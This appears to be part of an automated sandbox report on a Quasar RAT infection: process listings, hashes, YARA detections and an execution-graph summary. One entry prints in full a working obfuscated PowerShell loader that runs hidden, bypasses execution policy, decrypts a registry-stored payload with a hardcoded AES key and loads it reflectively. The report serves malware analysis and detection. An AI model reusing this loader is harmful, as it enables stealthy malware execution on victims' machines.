                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000012.00000002.2928056042.0000028528D41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000012.00000002.3104746555.0000028539051000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                    Antivirus matches:
                                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                                    • Detection: 0%, Virustotal, Browse
                                                                                                                    Has exited:false

                                                                                                                    Target ID:19
                                                                                                                    Start time:16:55:38
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\System32\dllhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\System32\dllhost.exe /Processid:{d814285b-904f-4c3a-8cab-4579f96b72d9}
                                                                                                                    Imagebase:0x7ff70f330000
                                                                                                                    File size:21'312 bytes
                                                                                                                    MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:20
                                                                                                                    Start time:16:55:38
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\SysWOW64\dllhost.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\dllhost.exe /Processid:{f835588e-a1ef-4d6b-bc1e-b44ddb22d787}
                                                                                                                    Imagebase:0xf80000
                                                                                                                    File size:19'256 bytes
                                                                                                                    MD5 hash:6F3C9485F8F97AC04C8E43EF4463A68C
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:21
                                                                                                                    Start time:16:55:41
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\$sxr-powershell.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5088).WaitForExit();[System.Threading.Thread]::Sleep(5000); function ZXowG($YGfCS){ $HJBVM=[System.Security.Cryptography.Aes]::Create(); $HJBVM.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HJBVM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HJBVM.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc='); $HJBVM.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w=='); $SHNYR=$HJBVM.('rotpyrceDetaerC'[-1..-15] -join '')(); $ptoRz=$SHNYR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YGfCS, 0, $YGfCS.Length); $SHNYR.Dispose(); $HJBVM.Dispose(); $ptoRz;}function MiajR($YGfCS){ $VHZiJ=New-Object System.IO.MemoryStream(,$YGfCS); $MKYCr=New-Object System.IO.MemoryStream; $pphYy=New-Object System.IO.Compression.GZipStream($VHZiJ, [IO.Compression.CompressionMode]::Decompress); $pphYy.CopyTo($MKYCr); $pphYy.Dispose(); $VHZiJ.Dispose(); $MKYCr.Dispose(); $MKYCr.ToArray();}function DEttm($YGfCS,$ZtwIE){ $mZolj=[System.Reflection.Assembly]::Load([byte[]]$YGfCS); $lOFyP=$mZolj.EntryPoint; $lOFyP.Invoke($null, $ZtwIE);}$HJBVM1 = New-Object System.Security.Cryptography.AesManaged;$HJBVM1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$HJBVM1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$HJBVM1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc=');$HJBVM1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w==');$GhtEl = $HJBVM1.('rotpyrceDetaerC'[-1..-15] -join '')();$tSRUF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/drqfgtKhdXyibTYP3tLyQ==');$tSRUF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF, 0, $tSRUF.Length);$tSRUF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF);$tbgVF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uYhEUY/+HnwQeclFyB1FDUqtQym+nHVdwwfjEKKh6LU=');$tbgVF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tbgVF, 0, $tbgVF.Length);$tbgVF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tbgVF);$mjWsq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v2S4NwnXvXtvXwhesSwNIQ==');$mjWsq = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mjWsq, 0, $mjWsq.Length);$mjWsq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mjWsq);$iBFKh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RZnS/OPKxZu99whpuaUC1mhVovuCskWdCRfz1FlzhkQ9viPcHXWbSXtn8ebOdAixZCvIKg7kNsNJQfjixS10DgPnP1RgMFsS0Ufgfy1HhpeBrScxYLrFwuGlVdIKxKsNCNlET01ZQTP7t1afzsZuiFRyhdaoNNd/a48fSObOV6s0Dg4uz6IT5eoHk560k0oKDQhofXeJn4REmUW/Qa+OFgHhvk0nKSZmZIWIfiCOl824A/iJhUAIvvnXISy3KfqXbk9SxrWiI48yb3R5eHDU2SFOOdwj4/P9sUdFWqjTGEiXdZH4kVSXjz0XVe4ZYpD+he6+N8ebMZVScb8HKUN/+DzmXUfDtfwWV5MarCY6ZdmO2yJ4s2sbOzZsPvxKUwPa7yfFsYHuzQ4rPk9Yysf5MqWX04//4DGnhGl+/sl+WZ0=');$iBFKh = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBFKh, 0, $iBFKh.Length);$iBFKh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($iBFKh);$sRLEH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NPfQRzZslsp7LUVLS08LhQ==');$sRLEH = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sRLEH, 0, $sRLEH.Length);$sRLEH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sRLEH);$sLsEZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bw6rZXASWFOFrL4CLrePaw==');$sLsEZ = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sLsEZ, 0, $sLsEZ.Length);$sLsEZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sLsEZ);$SPFoS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QYOQkrgRiSqCZw4PoX3ndQ==');$SPFoS = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SPFoS, 0, $SPFoS.Length);$SPFoS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SPFoS);$xCumf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SdFQ7WIJndJ4NA0XksAXZg==');$xCumf = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xCumf, 0, $xCumf.Length);$xCumf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xCumf);$WAkXF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('AR4GvTa2A8uikK6+T2nKoQ==');$WAkXF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WAkXF, 0, $WAkXF.Length);$WAkXF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WAkXF);$tSRUF0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('L3o7gT8T96iY71qHMveksg==');$tSRUF0 = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF0, 0, $tSRUF0.Length);$tSRUF0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF0);$tSRUF1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('E8Y/0E3VS02vVNfuFqTGCw==');$tSRUF1 = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF1, 0, $tSRUF1.Length);$tSRUF1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF1);$tSRUF2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3ob3sb5+Bgi0uwQxb9HNKg==');$tSRUF2 = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF2, 0, $tSRUF2.Length);$tSRUF2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF2);$tSRUF3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('E46YnTPfmALJD+Ie1fVvGQ==');$tSRUF3 = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF3, 0, $tSRUF3.Length);$tSRUF3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF3);$GhtEl.Dispose();$HJBVM1.Dispose();if (@(get-process -ea silentlycontinue $tSRUF3).count -gt 1) {exit};$BcpNi = [Microsoft.Win32.Registry]::$xCumf.$SPFoS($tSRUF).$sLsEZ($tbgVF);$QCqEG=[string[]]$BcpNi.Split('\');$BPwjg=MiajR(ZXowG([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QCqEG[1])));DEttm $BPwjg (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$RLOOe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QCqEG[0]);$HJBVM = New-Object System.Security.Cryptography.AesManaged;$HJBVM.Mode = [System.Security.Cryptography.CipherMode]::CBC;$HJBVM.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$HJBVM.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc=');$HJBVM.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w==');$SHNYR = $HJBVM.('rotpyrceDetaerC'[-1..-15] -join '')();$RLOOe = $SHNYR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RLOOe, 0, $RLOOe.Length);$SHNYR.Dispose();$HJBVM.Dispose();$VHZiJ = New-Object System.IO.MemoryStream(, $RLOOe);$MKYCr = New-Object System.IO.MemoryStream;$pphYy = New-Object System.IO.Compression.GZipStream($VHZiJ, [IO.Compression.CompressionMode]::$tSRUF1);$pphYy.$WAkXF($MKYCr);$pphYy.Dispose();$VHZiJ.Dispose();$MKYCr.Dispose();$RLOOe = $MKYCr.ToArray();$jMAvT = $iBFKh | IEX;$mZolj = $jMAvT::$tSRUF2($RLOOe);$lOFyP = $mZolj.EntryPoint;$lOFyP.$tSRUF0($null, (, [string[]] ($mjWsq)))
                                                                                                                    Imagebase:0x7ff731020000
                                                                                                                    File size:452'608 bytes
                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                    Has exited:false

                                                                                                                    Target ID:22
                                                                                                                    Start time:16:55:42
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\System32\dllhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\System32\dllhost.exe /Processid:{ee0091e4-9e0c-4ff3-b26f-57d4a238bd7c}
                                                                                                                    Imagebase:0x7ff70f330000
                                                                                                                    File size:21'312 bytes
                                                                                                                    MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:23
                                                                                                                    Start time:16:55:42
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\SysWOW64\dllhost.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\dllhost.exe /Processid:{f5381469-1700-4694-82dd-1722ad94b3e0}
                                                                                                                    Imagebase:0x7ff6eef20000
                                                                                                                    File size:19'256 bytes
                                                                                                                    MD5 hash:6F3C9485F8F97AC04C8E43EF4463A68C
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:24
                                                                                                                    Start time:16:55:42
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\System32\winlogon.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:winlogon.exe
                                                                                                                    Imagebase:0x7ff7cd660000
                                                                                                                    File size:906'240 bytes
                                                                                                                    MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:false

                                                                                                                    Target ID:25
                                                                                                                    Start time:16:55:42
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\System32\lsass.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\lsass.exe
                                                                                                                    Imagebase:0x7ff7a2ae0000
                                                                                                                    File size:59'456 bytes
                                                                                                                    MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:false

                                                                                                                    Target ID:26
                                                                                                                    Start time:16:55:43
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                    Imagebase:0xdd0000
                                                                                                                    File size:418'304 bytes
                                                                                                                    MD5 hash:64ACA4F48771A5BA50CD50F2410632AD
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:27
                                                                                                                    Start time:16:55:43
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                                                                                    Imagebase:0x7ff6eef20000
                                                                                                                    File size:55'320 bytes
                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:false

                                                                                                                    Target ID:28
                                                                                                                    Start time:16:55:43
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\System32\dllhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\System32\dllhost.exe /Processid:{f78b27af-93da-4459-95e7-4c5d26a44dc8}
                                                                                                                    Imagebase:0x7ff70f330000
                                                                                                                    File size:21'312 bytes
                                                                                                                    MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:29
                                                                                                                    Start time:16:55:43
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\System32\dllhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\System32\dllhost.exe /Processid:{85d85a52-fed6-47b1-b615-c3a69ff1ad14}
                                                                                                                    Imagebase:0x7ff70f330000
                                                                                                                    File size:21'312 bytes
                                                                                                                    MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:30
                                                                                                                    Start time:16:55:43
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\System32\dwm.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:dwm.exe
                                                                                                                    Imagebase:0x7ff74e710000
                                                                                                                    File size:94'720 bytes
                                                                                                                    MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:false

                                                                                                                    Target ID:31
                                                                                                                    Start time:16:55:44
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                                                                    Imagebase:0x7ff6eef20000
                                                                                                                    File size:55'320 bytes
                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:false

                                                                                                                    Target ID:32
                                                                                                                    Start time:16:55:45
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\SysWOW64\dllhost.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\dllhost.exe /Processid:{8c0bd129-911b-4af2-a0bc-93995d45cd5f}
                                                                                                                    Imagebase:0xf80000
                                                                                                                    File size:19'256 bytes
                                                                                                                    MD5 hash:6F3C9485F8F97AC04C8E43EF4463A68C
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:33
                                                                                                                    Start time:16:55:45
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\SysWOW64\dllhost.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\dllhost.exe /Processid:{0979c3ff-3e63-4ea9-9d2b-0e24c33cbca9}
                                                                                                                    Imagebase:0xf80000
                                                                                                                    File size:19'256 bytes
                                                                                                                    MD5 hash:6F3C9485F8F97AC04C8E43EF4463A68C
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:34
                                                                                                                    Start time:16:55:45
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\System32\dllhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\System32\dllhost.exe /Processid:{59453cd9-80c7-4c7f-84ca-38ec20f032b9}
                                                                                                                    Imagebase:0x7ff70f330000
                                                                                                                    File size:21'312 bytes
                                                                                                                    MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:35
                                                                                                                    Start time:16:55:45
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\System32\dllhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\System32\dllhost.exe /Processid:{8b9e4941-156b-4561-b75c-88dc752d3d8b}
                                                                                                                    Imagebase:0x7ff70f330000
                                                                                                                    File size:21'312 bytes
                                                                                                                    MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:36
                                                                                                                    Start time:16:55:45
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                                                                                    Imagebase:0x7ff6eef20000
                                                                                                                    File size:55'320 bytes
                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:false

                                                                                                                    Target ID:37
                                                                                                                    Start time:16:55:45
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe"
                                                                                                                    Imagebase:0x590000
                                                                                                                    File size:140'800 bytes
                                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:false

                                                                                                                    Target ID:38
                                                                                                                    Start time:16:55:45
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                    Imagebase:0x7ff6eef20000
                                                                                                                    File size:55'320 bytes
                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:false

                                                                                                                    Target ID:39
                                                                                                                    Start time:16:55:45
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe"
                                                                                                                    Imagebase:0x590000
                                                                                                                    File size:140'800 bytes
                                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:false

                                                                                                                    Target ID:40
                                                                                                                    Start time:16:55:46
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                                                                                    Imagebase:0x7ff6eef20000
                                                                                                                    File size:55'320 bytes
                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:false

                                                                                                                    Target ID:41
                                                                                                                    Start time:16:55:46
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\SysWOW64\dllhost.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\dllhost.exe /Processid:{da1a065e-b06d-4c17-9fd5-69413fe213f9}
                                                                                                                    Imagebase:0xf80000
                                                                                                                    File size:19'256 bytes
                                                                                                                    MD5 hash:6F3C9485F8F97AC04C8E43EF4463A68C
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:42
                                                                                                                    Start time:16:55:46
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Windows\SysWOW64\dllhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\SysWOW64\dllhost.exe /Processid:{2c62f067-a6a0-49cc-8f1a-bf6b18a4e5be}
                                                                                                                    Imagebase:0xf80000
                                                                                                                    File size:19'256 bytes
                                                                                                                    MD5 hash:6F3C9485F8F97AC04C8E43EF4463A68C
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:43
                                                                                                                    Start time:16:55:47
                                                                                                                    Start date:03/12/2023
                                                                                                                    Path:C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe"
                                                                                                                    Imagebase:0x590000
                                                                                                                    File size:140'800 bytes
                                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:false

                                                                                                                    Reset < >

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:47.2%
                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                      Signature Coverage:74.4%
                                                                                                                      Total number of Nodes:43
                                                                                                                      Total number of Limit Nodes:2
                                                                                                                      execution_graph 167 140000231 ExitProcess 116 140001000 119 140001014 GetCurrentProcessId OpenProcess 116->119 118 140001009 ExitProcess 120 140001045 OpenProcessToken 119->120 121 1400010bd RegOpenKeyExW 119->121 124 1400010b4 CloseHandle 120->124 125 14000105b LookupPrivilegeValueW 120->125 122 1400010e7 RegDeleteValueW 121->122 123 1400010f8 SysAllocString SysAllocString CoInitializeEx 121->123 122->123 126 140001241 SysFreeString SysFreeString GetProcessHeap HeapAlloc 123->126 127 14000112a CoInitializeSecurity 123->127 124->121 125->124 128 140001072 AdjustTokenPrivileges 125->128 145 140001368 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 126->145 130 140001173 CoCreateInstance 127->130 131 140001168 127->131 128->124 132 1400010ae GetLastError 128->132 134 14000123b CoUninitialize 130->134 135 1400011a3 VariantInit 130->135 131->130 131->134 132->124 133 140001280 136 1400012d4 GetProcessHeap HeapFree RtlDeleteBoundaryDescriptor HeapAlloc 133->136 141 1400012a0 OpenProcess 133->141 134->126 138 1400011f9 135->138 137 140001368 13 API calls 136->137 140 140001315 137->140 138->134 139 140001342 GetProcessHeap HeapFree 139->118 140->139 143 140001330 140->143 141->133 142 1400012b6 TerminateProcess CloseHandle 141->142 142->133 153 14000155c 143->153 146 1400013f5 145->146 147 1400014c8 GetProcessHeap HeapFree RtlDeleteBoundaryDescriptor HeapFree 145->147 146->147 148 14000140a OpenProcess 146->148 150 1400014b3 CloseHandle 146->150 151 140001459 ReadProcessMemory 146->151 147->133 148->146 149 140001427 K32EnumProcessModules 148->149 149->146 149->150 150->146 152 14000147b 151->152 152->146 152->150 152->151 154 14000157b OpenProcess 153->154 155 1400015d0 153->155 154->155 156 140001593 154->156 155->140 161 1400015e4 156->161 164 140001648 GetModuleHandleA 161->164 165 140001663 GetProcAddress 164->165 166 1400015f9 164->166 165->166

                                                                                                                      Callgraph

